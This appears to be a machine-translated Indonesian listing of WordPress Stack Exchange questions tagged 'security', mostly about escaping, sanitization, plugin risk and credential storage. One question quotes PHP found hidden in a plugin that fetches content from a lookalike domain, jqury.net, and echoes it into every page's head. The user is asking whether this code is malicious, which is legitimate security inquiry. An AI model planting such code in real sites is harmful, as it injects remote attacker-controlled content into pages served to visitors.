Pertanyaan yang diberi tag «security»

Tutup. Pertanyaan ini di luar topik . Saat ini tidak menerima jawaban. Ingin meningkatkan pertanyaan ini? Perbarui pertanyaan sehingga sesuai topik untuk WordPress Development Stack Exchange. Ditutup 4 tahun yang lalu . Saya menginstal plugin Simple Login Lockdown dan sejak beberapa hari yang lalu database merekam lebih dari 200 catatan …

20 login  security 

Saya punya klien yang diretas baru-baru ini dan saya perhatikan ada karakter aneh yang muncul di situsnya, seperti  dan Æ. Ternyata para peretas mengubah blog_charset menjadi UTF-7 dalam wp_optionstabel di dalam basis data. Saya mengaturnya kembali ke UTF-8, tetapi saya bertanya-tanya apakah selama waktu itu diatur ke UTF-7, dapatkah …

19 security  encoding  hacked  characters 

Saya baru mengenal WordPress. Baru-baru ini saya membaca sebuah artikel tentang bagaimana peretas dapat mengeksploitasi kerentanan dalam plugin. Berbagai sumber seperti Google Pagespeed juga telah mencegah saya menggunakan plugin atau setidaknya membuatnya seminimal mungkin. Secara pribadi, saya juga mencoba menghindari plugin karena saya merasa lebih bisa mengendalikan apa yang terjadi …

19 plugins  security 

Saat ini saya sedang mengembangkan sebuah plugin dan kemungkinan besar saya akan merilisnya di repositori plugin publik sehingga orang lain dapat menggunakannya. Plugin akan menggunakan API dan untuk menggunakan API ini Anda harus memberikan nama pengguna dan kata sandi. Jadi plugin saya perlu menyimpan kredensial login ini dalam database. Saya …

19 plugin-development  security  api  encryption 

Saya menemukan ini di sebuah plugin. Apa fungsinya? Apa ini berbahaya? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Saya ingin memastikan semua data di plugin / tema saya ditangani dengan aman sebelum memasukkan basis data dan sebelum di-output ke browser. Masalah saya adalah ada beberapa situasi di mana API menangani sanitasi untuk Anda - seperti saat menyimpan kolom meta pos - dan lainnya di mana pembuat plugin / …

17 plugin-development  security  customization  validation  sanitization 

Apakah menjaga wp-admin/install.phpdan wp-admin/install-helper.phpkeamanan bocor pada versi wordpress yang lebih baru? Secara default izin file pada file-file itu adalah 644. Jika ada kebocoran, tolong apa?

16 security  installation 

Seperti yang ada saat ini, pertanyaan ini tidak cocok untuk format Tanya Jawab kami. Kami berharap jawaban didukung oleh fakta, referensi, atau keahlian, tetapi pertanyaan ini kemungkinan akan mengundang debat, argumen, polling, atau diskusi panjang. Jika Anda merasa bahwa pertanyaan ini dapat diperbaiki dan mungkin dibuka kembali, kunjungi pusat bantuan …

16 plugins  plugin-development  security  sql 

Saya melihat bahwa SVG diblokir secara default di pengunggah media dan Anda harus menambahkannya sebagai tipe MIME yang didukung di functions.php. Apa alasan keamanan di balik ini?

15 media  security  svg 

Saya telah melihat kode tetapi saya tidak bisa melihat ada yang keluar dari fungsi seperti the_title the_content the_excerptdll. Saya mungkin tidak membacanya dengan benar. Apakah saya perlu keluar dari fungsi-fungsi ini dalam pengembangan tema seperti: esc_html ( the_title () ) Sunting: sebagaimana ditunjukkan dalam jawaban di bawah, kode di atas …

15 security  escaping 

Kami mengalami beberapa masalah dengan pengembang eksternal. Kami ingin membatasi akses ke wp-adminsitus hanya untuk akses internal (melalui VPN ). Sederhananya itu tidak akan diserang oleh pengguna eksternal. Kami dapat menghitung admin dari situs dan tidak ingin mereka di-phishing. Pengembang kami mengatakan kami tidak dapat melakukan itu karena situs perlu …

14 admin  ajax  security 

Hanya pertanyaan singkat yang mungkin membantu sedikit keamanan. Saya perhatikan bahwa file readme.html memiliki nomor versi yang terdaftar. Ini muncul kembali setelah setiap peningkatan dan begitu juga dengan licence.txt, dan wp-config-sample.php. Apakah ada cara mudah untuk membuat WordPress otomatis menghapus file-file ini setelah peningkatan? Saya sudah memblokir nomor versi agar …

13 security  wp-config 

Mengkonfigurasi WordPress untuk memperbarui dalam aplikasi (yaitu WordPress) sangat ideal bagi saya karena kemudahannya. Meskipun demikian, saya bermasalah dengan persyaratan. Kolom yang diminta yang muncul setelah menginstal ssh2 untuk php tidak hanya meminta kunci publik saya, tetapi juga kunci pribadi saya. Saya akan berpikir bahwa, paling banyak, hanya kunci publik …

13 security  updates  ssh 

Melihat Codex untuk wp_insert_post () itu menyatakan bahwa fungsi ini "... membersihkan variabel, melakukan beberapa pemeriksaan, mengisi variabel yang hilang seperti tanggal / waktu, dll." (EDIT: Saya memperbarui entri Codex untuk memasukkan contoh yang lebih kuat. itu termasuk keamanan serta penugasan meta dan kategori) Hanya ingin tahu apakah saya perlu …

13 security  sanitization 

Hal ini membuat coding saya sulit. Codex Wordpress beralasan menggunakan esc_url dengan berbicara sedikit tentang keamanan. Tetapi apakah itu benar-benar sepadan dengan masalahnya? Misalnya, apa manfaat keamanan praktis yang penting dengan menggunakan <?php echo esc_url( home_url( '/' ) ); ?> dari pada <?php echo home_url() ?> PS: Saya tidak berbicara …

12 security